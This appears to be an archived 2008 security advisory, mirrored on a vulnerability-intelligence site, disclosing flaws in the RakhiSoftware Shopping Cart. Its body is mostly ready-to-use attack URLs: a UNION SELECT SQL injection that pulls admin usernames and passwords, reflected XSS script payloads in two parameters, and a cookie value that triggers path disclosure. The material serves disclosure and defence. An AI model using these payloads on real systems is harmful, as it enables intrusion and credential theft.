Lucene search

rakhi-sqlxssfpd.txt

🗓️ 29 Nov 2008 00:00:00Reported by Glafkos CharalambousType

packetstorm🔗 packetstormsecurity.com👁 18 Views

RakhiSoftware Shopping Cart SQL,XSS,FPD Vulnerabilitie

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Application: RakhiSoftware Shopping Cart  
  
Vendor Name: RakhiSoftware  
  
Vendors Url: http://willscript.com/  
  
Bug Type: RakhiSoftware Shopping Cart (SQL,XSS,FPD) Multiple  
Vulnerabilities  
  
  
  
SQL category_id  
  
http://willscript.com/rjbike_new/product.php?category_id=1+union%20select%20  
1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  
,20,21%20from%20admin--&subcategory_id=1  
  
  
  
XSS category_id, subcategory_id  
  
http://willscript.com/rjbike_new/product.php?category_id=>'><script>alert(19  
49308870);</script>&subcategory_id=1  
  
http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=>'  
><script>alert(1949308870);</script>  
  
  
  
Full Path Disclosure on every page  
  
Set Cookie: PHPSESSID='  
  
  
  
Credits:  
  
Charalambous Glafkos  
  
Email: glafkos (at) astalavista (dot) com  
  
___________________________________________  
  
ASTALAVISTA - the hacking & security community  
  
www.astalavista.com  
  
www.astalavista.net  
  
  
  
  
  
Best Regards,  
Charalambous Glafkos ( nowayout )  
__________________________________________  
ASTALAVISTA - the hacking & security community  
<http://www.astalavista.com/> www.astalavista.com  
<http://www.astalavista.net/> www.astalavista.net  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

29 Nov 2008 00:00Current

7.4High risk

Vulners AI Score7.4